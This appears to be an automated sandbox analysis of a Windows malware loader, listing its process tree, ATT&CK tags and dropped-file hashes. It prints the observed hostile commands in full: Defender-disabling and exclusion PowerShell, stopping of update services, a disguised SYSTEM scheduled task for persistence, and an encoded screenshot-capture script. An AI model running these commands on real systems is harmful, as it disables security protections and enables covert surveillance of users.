- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Drops file in Drivers directory
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1540
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:792
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\AppData\Local\Temp\loader.exe
    3⤵
    - Views/modifies file attributes
    PID:2316
- - C:\Windows\System32\Wbem\wmic.exe
    wmic os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\loader.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4832
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\WindowsSecurity.exe
    3⤵
    - Views/modifies file attributes
    PID:4212
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
- - C:\Windows\System32\Wbem\wmic.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2204
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get UUID
    3⤵
    PID:4340
- - C:\Windows\system32\attrib.exe
    attrib -r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:3188
- - C:\Windows\system32\attrib.exe
    attrib +r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:4816
- - C:\Windows\system32\netsh.exe
    netsh wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4156
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1g5hk2uu\1g5hk2uu.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4124
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA112.tmp" "c:\Users\Admin\AppData\Local\Temp\1g5hk2uu\CSC788ACC0F17C94E069B5F76449BE069C.TMP"
        5⤵
        
        PID:3636
- - C:\Users\Admin\AppData\Local\Temp\.exe
    C:\Users\Admin\AppData\Local\Temp\.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:3252
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2012
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4340
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5064
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2156
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4684
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2268
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4616
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfgfynpn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2284
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5096
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:3140
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4364
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1324
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:3560
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:612
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4752
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2648
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4320
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3764
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2432
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:3268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfgfynpn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:528
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3636
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:3936
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:4784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3532

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3752

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3928

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2436

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4312

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4900

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2096

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:380

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:1456

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1632

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:2872

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:1092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
328B

MD5
d9e2742a0216aac3d69265aecafd56b2

SHA1
25e4b98747b8ceb051e146422040599d36607d44

SHA256
35cbd83b7ad138626e57929b47b8e0c0e22c894b79eb102b40e5b66f94faabdc

SHA512
acc577ebcef47c7e1a50ddc426bd6f3ca5084a467c79ded927d138011d1df060f3c514d941917bfab0e2664083bcf5ea69ca3a0a55b082fe2cbd38b4b4f19bdf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aaec900735521f805299b4b5c1a6d24c

SHA1
79027d6a32fb1a47145e85752663d85ef0cb4ee4

SHA256
f53334cbba70f50f49096338882f66de938ebc1a0eb677f2f6e46014a081f303

SHA512
c61bbfda417527e6f12495a803cd813e4558d4f4a104f090e78b65f468a1778d65b40d9ba1329c0842726d3126692b74726bae2daa34afd38b2881700f947187

Download Submit
C:\Users\Admin\AppData\Local\Temp\1g5hk2uu\1g5hk2uu.dll

Filesize
4KB

MD5
d982239c495bb85e02f4db3b185d9983

SHA1
2f1f2684b8648acc05c37c6580cb8b196cb8fc49

SHA256
9022ba5db4c54ed0a2d10b92cf702c3ceff1c5bd31767b36a94d3371c0da0b7b

SHA512
a9a231f751316b9daf51de3ef8c18e493f1696195853dc3bcdc5a6ea15b1837830dd637e807cedbd07b1e0f78c996f9c78bc632e9fa6f11c466115722d23fd82

Download Submit
C:\Users\Admin\AppData\Local\Temp\AmzgTITBNp\Display (1).png

Filesize
427KB

MD5
e65a290735d1643e9c8b3bbd81dce4c3

SHA1
1cb202c22eec209c8a61aed1f943c6a71687a3e1

SHA256
c66ecf8307e4bcbcc88f46c83b8eba02a60c37b72950d95b6f54c18b2454f71e

SHA512
b737a9e4797cc83c9ee44b7c6483ca1063bc22b5883f68ee4accebcc5e72b49ef5586d7dcd4bb18e85d50aa73e7e995e80719282632c4326e9d1107e79b2e9ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA112.tmp

Filesize
1KB

MD5
93744cc41f526f4debbc28b97083fd5b

SHA1
33b0b51709c799ad3994f1b7811bb782ae25dac0

SHA256
69e70c91dfd26ed35ad5b5451d8770fadae3d1d295a7a58e550da0288f391506

SHA512
93ff3e47fa4863118b5dfe2d7c17b66d93cfb86ee159f70e0fc79853ff23caf4d7c723be76d3c5914d961f6e7a89a1ec4478c22edaee4ca6a101037caed036b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tawvna5w.g5p.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\WindowsSecurity.exe

Filesize
14.4MB

MD5
0b36da64b85e5abae7a93017d46dcce1

SHA1
40506f88be2a8f9fc03083f8d934b58fe22c3ae5

SHA256
0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903

SHA512
a0a8fbb2127451ae7c776fff5e2d26d1d8e035527010f7f91a2904a76edfcaa054bf5becddc29fbe98e49bd211f8ae1f94c884e8e92c9b62984313cf843d9572

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1g5hk2uu\1g5hk2uu.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1g5hk2uu\1g5hk2uu.cmdline

Filesize
607B

MD5
365cf5d0b42268114f11cc89bd4191b6

SHA1
d10e52e5295beff9d5d83675229e9ef8c9fe85f4

SHA256
87198786982822a43be4aa115fd91768a23a6f58fe7d6d7cbbb73f64744c49c9

SHA512
6a20507d42d3d59307a8ef3481393b649bc6dceceabeaf803514d248ca5fcb589a6410edd4d9a13f4daf86ff827c7237e2ee0a3bddd0cb5de28e6b85f1e8329d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1g5hk2uu\CSC788ACC0F17C94E069B5F76449BE069C.TMP

Filesize
652B

MD5
05fc36d033cc42b70060601bd8bc4f7d

SHA1
d5173b49d05e40828b97af0a009621dd9128928c

SHA256
243e01e9202d65461abdc9416f3cacb287c46b8e5d191340cfe579ba76f07989

SHA512
93dc52c7a877736b907054991fb1b94490ad033135cbae6d2256d962f28db87aef3fc6a78e556e73b927e926c706f18d5c5739c2d4e0df74efe36826b089779e

Download Submit
memory/316-95-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/316-94-0x000001CDA9990000-0x000001CDA99B7000-memory.dmp

Filesize
156KB

Download
memory/392-102-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/392-101-0x0000014865F60000-0x0000014865F87000-memory.dmp

Filesize
156KB

Download
memory/616-86-0x000002A5E7290000-0x000002A5E72B7000-memory.dmp

Filesize
156KB

Download
memory/616-84-0x000002A5E7260000-0x000002A5E7281000-memory.dmp

Filesize
132KB

Download
memory/616-88-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/672-90-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/672-87-0x0000026FF57D0000-0x0000026FF57F7000-memory.dmp

Filesize
156KB

Download
memory/952-99-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/952-98-0x000001B4D4F00000-0x000001B4D4F27000-memory.dmp

Filesize
156KB

Download
memory/996-117-0x000001C1A4800000-0x000001C1A4827000-memory.dmp

Filesize
156KB

Download
memory/996-118-0x00007FF9C4350000-0x00007FF9C4360000-memory.dmp

Filesize
64KB

Download
memory/1116-120-0x00000243EC540000-0x00000243EC567000-memory.dmp

Filesize
156KB

Download
